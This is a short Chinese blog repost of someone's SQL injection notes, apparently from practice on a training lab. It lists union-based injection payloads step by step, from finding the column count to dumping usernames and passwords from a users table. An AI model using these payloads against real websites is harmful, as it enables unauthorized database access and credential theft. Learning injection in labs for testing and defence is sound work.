首页 > 数据库技术 > 详细

sql 总结

时间:2020-07-22 01:07:17      阅读:77      评论:0      收藏:0      [点我收藏+]

一、有回显

1、边缘试探 列数,
?id=1‘ order by X --+
 
2、查看当前库名
?id=-1‘ union select 1,2,X database() --+
 
3、显示当前数据库的 表名
?id=-1‘ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘XXXX‘ --+
 
4、判断表名,显示段名
?id=-1‘ union select 1,2,group_concat(column_name)  from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ --+
 
5、显示用户名 密码
    ?id=-1‘ union select 1,2,group_concat(username,":",password) from users --+

sql 总结

原文:https://www.cnblogs.com/zxnimud/p/13357741.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!